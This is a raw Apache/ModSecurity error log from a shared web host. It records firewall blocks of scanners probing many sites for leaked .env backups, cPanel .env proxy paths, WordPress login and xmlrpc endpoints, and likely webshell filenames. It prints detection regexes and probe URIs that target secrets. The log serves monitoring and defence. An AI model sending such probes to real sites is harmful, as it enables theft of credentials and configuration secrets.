[Tue May 26 12:53:46.439038 2026] [security2:error] [pid 461618:tid 461850] [client 208.84.100.109:30340] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.orig"] [unique_id "ahVKglyiSlSCHr1fdr2tzwAAAOs"]
[Tue May 26 12:53:46.439037 2026] [security2:error] [pid 461618:tid 461856] [client 208.84.100.109:30288] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.local.bak"] [unique_id "ahVKglyiSlSCHr1fdr2t0AAAAPE"]
[Tue May 26 12:53:46.440346 2026] [security2:error] [pid 461618:tid 461758] [client 208.84.100.109:30794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.production.swp"] [unique_id "ahVKglyiSlSCHr1fdr2t0QAAAI8"]
[Tue May 26 12:53:46.443035 2026] [security2:error] [pid 461618:tid 461840] [client 208.84.100.109:30784] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.production~"] [unique_id "ahVKglyiSlSCHr1fdr2t1QAAAOE"]
[Tue May 26 12:53:46.443902 2026] [security2:error] [pid 461618:tid 461829] [client 208.84.100.109:30762] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.production.backup"] [unique_id "ahVKglyiSlSCHr1fdr2t2AAAANY"]
[Tue May 26 12:53:46.444515 2026] [security2:error] [pid 461618:tid 461807] [client 208.84.100.109:30752] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.production.old"] [unique_id "ahVKglyiSlSCHr1fdr2t1AAAAMA"]
[Tue May 26 12:53:46.444790 2026] [security2:error] [pid 461618:tid 461779] [client 208.84.100.109:30714] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.local~"] [unique_id "ahVKglyiSlSCHr1fdr2t1wAAAKQ"]
[Tue May 26 12:53:46.445915 2026] [security2:error] [pid 461618:tid 461781] [client 208.84.100.109:30732] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.local.orig"] [unique_id "ahVKglyiSlSCHr1fdr2t1gAAAKY"]
[Tue May 26 12:53:46.445927 2026] [security2:error] [pid 461618:tid 461809] [client 208.84.100.109:30696] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.local.old"] [unique_id "ahVKglyiSlSCHr1fdr2t2QAAAMI"]
[Tue May 26 12:53:46.446067 2026] [security2:error] [pid 461618:tid 461803] [client 208.84.100.109:30796] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.production.orig"] [unique_id "ahVKglyiSlSCHr1fdr2t0wAAALw"]
[Tue May 26 12:53:46.446112 2026] [security2:error] [pid 461618:tid 461831] [client 208.84.100.109:30744] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.production.bak"] [unique_id "ahVKglyiSlSCHr1fdr2t3wAAANg"]
[Tue May 26 12:53:46.446215 2026] [security2:error] [pid 461618:tid 461823] [client 208.84.100.109:30718] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.local.swp"] [unique_id "ahVKglyiSlSCHr1fdr2t4AAAANA"]
[Tue May 26 12:53:46.447273 2026] [security2:error] [pid 461618:tid 461853] [client 208.84.100.109:30706] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.local.backup"] [unique_id "ahVKglyiSlSCHr1fdr2t3AAAAO4"]
[Tue May 26 12:53:46.449270 2026] [security2:error] [pid 461618:tid 461763] [client 208.84.100.109:30742] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.local.copy"] [unique_id "ahVKglyiSlSCHr1fdr2t2wAAAJQ"]
[Tue May 26 12:53:46.450474 2026] [security2:error] [pid 461618:tid 461752] [client 208.84.100.109:30360] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "consola.jhonweb.com"] [uri "/.env.copy"] [unique_id "ahVKglyiSlSCHr1fdr2t0gAAAIk"]
[Tue May 26 12:53:46.565218 2026] [security2:error] [pid 461618:tid 461811] [client 173.252.79.10:59536] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahVKglyiSlSCHr1fdr2tzQAAxEU"]
[Tue May 26 12:53:47.089061 2026] [security2:error] [pid 461618:tid 461863] [client 173.252.79.1:52654] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahVKglyiSlSCHr1fdr2uDwAA-Gc"]
[Tue May 26 12:53:47.757345 2026] [security2:error] [pid 461618:tid 461869] [client 173.252.79.11:54970] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahVKg1yiSlSCHr1fdr2uIQAA1g0"]
[Tue May 26 12:53:47.869769 2026] [security2:error] [pid 461618:tid 461831] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKg1yiSlSCHr1fdr2uIAAAANg"]
[Tue May 26 12:53:48.040498 2026] [security2:error] [pid 461618:tid 461759] [client 173.252.79.11:54978] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahVKg1yiSlSCHr1fdr2uMQAAkCg"]
[Tue May 26 12:53:48.442261 2026] [security2:error] [pid 461618:tid 461813] [client 173.252.79.9:47088] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahVKhFyiSlSCHr1fdr2uSQAAxnY"]
[Tue May 26 12:53:48.848663 2026] [security2:error] [pid 461618:tid 461785] [client 173.252.79.3:44900] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahVKhFyiSlSCHr1fdr2uWwAAqiw"]
[Tue May 26 12:53:50.381132 2026] [security2:error] [pid 461618:tid 461861] [client 157.20.138.61:58862] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKhlyiSlSCHr1fdr2uqgAAAPY"]
[Tue May 26 12:53:50.381326 2026] [security2:error] [pid 461618:tid 461861] [client 157.20.138.61:58862] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKhlyiSlSCHr1fdr2uqgAAAPY"]
[Tue May 26 12:53:50.686392 2026] [security2:error] [pid 461618:tid 461824] [client 85.121.55.185:48274] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKhlyiSlSCHr1fdr2urgAAANE"]
[Tue May 26 12:53:50.752809 2026] [security2:error] [pid 461618:tid 461845] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKhlyiSlSCHr1fdr2upgAAAOY"]
[Tue May 26 12:53:50.764037 2026] [security2:error] [pid 461618:tid 461765] [client 74.249.173.207:4261] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/an.php"] [unique_id "ahVKhlyiSlSCHr1fdr2utgAAAJY"]
[Tue May 26 12:53:51.312138 2026] [autoindex:error] [pid 461618:tid 461771] [client 43.250.164.247:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/slider/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.ucdc.co.in/
[Tue May 26 12:53:51.338906 2026] [security2:error] [pid 461618:tid 461781] [client 43.250.164.247:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVKh1yiSlSCHr1fdr2u1gAAAKY"], referer: https://www.ucdc.co.in/
[Tue May 26 12:53:51.352480 2026] [autoindex:error] [pid 461618:tid 461764] [client 15.204.183.221:0] AH01276: Cannot serve directory /home2/glorolle/public_html/juniorwoodies.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://juniorwoodies.com/
[Tue May 26 12:53:52.122990 2026] [security2:error] [pid 461618:tid 461800] [client 74.249.173.207:4268] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/index/function.php"] [unique_id "ahVKiFyiSlSCHr1fdr2vAAAAALk"]
[Tue May 26 12:53:52.156757 2026] [security2:error] [pid 461618:tid 461780] [client 195.178.110.34:40954] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.canopykaapi.com"] [uri "/___proxy_subdomain_cpanel/env/.env"] [unique_id "ahVKiFyiSlSCHr1fdr2vAgAAAKU"]
[Tue May 26 12:53:52.776796 2026] [security2:error] [pid 461618:tid 461866] [client 85.208.96.208:60414] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/february-7th/list/"] [unique_id "ahVKiFyiSlSCHr1fdr2vGAAAAPs"]
[Tue May 26 12:53:52.776956 2026] [security2:error] [pid 461618:tid 461866] [client 85.208.96.208:60414] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/february-7th/list/"] [unique_id "ahVKiFyiSlSCHr1fdr2vGAAAAPs"]
[Tue May 26 12:53:52.917419 2026] [proxy:error] [pid 461618:tid 461758] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 12:53:52.917481 2026] [proxy_http:error] [pid 461618:tid 461758] [client 185.169.4.152:64965] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: binance.com
[Tue May 26 12:53:52.918081 2026] [proxy:error] [pid 461618:tid 461758] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 12:53:52.918152 2026] [proxy_http:error] [pid 461618:tid 461758] [client 185.169.4.152:64965] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: binance.com
[Tue May 26 12:53:53.184119 2026] [security2:error] [pid 461618:tid 461768] [client 123.16.146.60:52052] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.146.16.123.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahVKiFyiSlSCHr1fdr2vHAAAAJk"], referer: https://www.cagmedya.com/
[Tue May 26 12:53:53.504175 2026] [security2:error] [pid 461618:tid 461811] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKiVyiSlSCHr1fdr2vIAAAAMQ"]
[Tue May 26 12:53:53.888006 2026] [security2:error] [pid 461618:tid 461765] [client 74.249.173.207:4405] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/ws.php"] [unique_id "ahVKiVyiSlSCHr1fdr2vOQAAAJY"]
[Tue May 26 12:53:56.986063 2026] [security2:error] [pid 461618:tid 461721] [remote 103.95.119.103:34088] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-login.php"] [unique_id "ahVKjFyiSlSCHr1fdr2vhAAA72Y"]
[Tue May 26 12:53:57.306530 2026] [security2:error] [pid 461618:tid 461818] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKjFyiSlSCHr1fdr2vhwAAAMs"]
[Tue May 26 12:53:58.908376 2026] [security2:error] [pid 461618:tid 461871] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKjlyiSlSCHr1fdr2vwAAAAQA"]
[Tue May 26 12:54:01.208076 2026] [security2:error] [pid 461618:tid 461831] [client 157.20.138.61:59219] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKkVyiSlSCHr1fdr2wBAAAANg"]
[Tue May 26 12:54:01.208250 2026] [security2:error] [pid 461618:tid 461831] [client 157.20.138.61:59219] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKkVyiSlSCHr1fdr2wBAAAANg"]
[Tue May 26 12:54:01.447480 2026] [core:crit] [pid 461618:tid 461819] (13)Permission denied: [client 40.77.167.50:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 12:54:02.399062 2026] [security2:error] [pid 461618:tid 461767] [client 195.178.110.34:36982] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.canopykaapi.com"] [uri "/___proxy_subdomain_cpanel/env/.env"] [unique_id "ahVKklyiSlSCHr1fdr2wMwAAAJg"]
[Tue May 26 12:54:02.448375 2026] [security2:error] [pid 461618:tid 461760] [client 85.121.55.185:46662] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKklyiSlSCHr1fdr2wKwAAAJE"]
[Tue May 26 12:54:02.656439 2026] [security2:error] [pid 461618:tid 461861] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKklyiSlSCHr1fdr2wJwAAAPY"]
[Tue May 26 12:54:03.249588 2026] [security2:error] [pid 461618:tid 461838] [client 74.249.173.207:4400] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/404.php"] [unique_id "ahVKk1yiSlSCHr1fdr2wQwAAAN8"]
[Tue May 26 12:54:04.938836 2026] [security2:error] [pid 461618:tid 461752] [client 74.249.173.207:4397] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/wp-admin/user/index.php"] [unique_id "ahVKlFyiSlSCHr1fdr2wcwAAAIk"]
[Tue May 26 12:54:05.066267 2026] [security2:error] [pid 461618:tid 461789] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKlFyiSlSCHr1fdr2wbAAAAK4"]
[Tue May 26 12:54:05.842491 2026] [security2:error] [pid 461618:tid 461849] [client 74.249.173.207:4396] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/wp-conf.php"] [unique_id "ahVKlVyiSlSCHr1fdr2wkgAAAOo"]
[Tue May 26 12:54:06.167815 2026] [core:crit] [pid 461618:tid 461799] (13)Permission denied: [client 40.77.167.63:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 12:54:06.521206 2026] [core:crit] [pid 461618:tid 461781] (13)Permission denied: [client 157.55.39.195:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 12:54:07.376185 2026] [security2:error] [pid 461618:tid 461784] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKllyiSlSCHr1fdr2w7AAAAKk"]
[Tue May 26 12:54:09.210574 2026] [security2:error] [pid 461618:tid 461828] [client 74.249.173.207:4414] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVKmFyiSlSCHr1fdr2xZwAAANU"]
[Tue May 26 12:54:10.943920 2026] [security2:error] [pid 461618:tid 461864] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKmlyiSlSCHr1fdr2xswAAAPk"]
[Tue May 26 12:54:11.338916 2026] [security2:error] [pid 461618:tid 461830] [client 195.178.110.34:50258] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.canopykaapi.com"] [uri "/___proxy_subdomain_cpanel/api/.env"] [unique_id "ahVKm1yiSlSCHr1fdr2xzQAAANc"]
[Tue May 26 12:54:12.473977 2026] [security2:error] [pid 461618:tid 461779] [client 157.20.138.61:59585] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVKnFyiSlSCHr1fdr2x7wAAAKQ"]
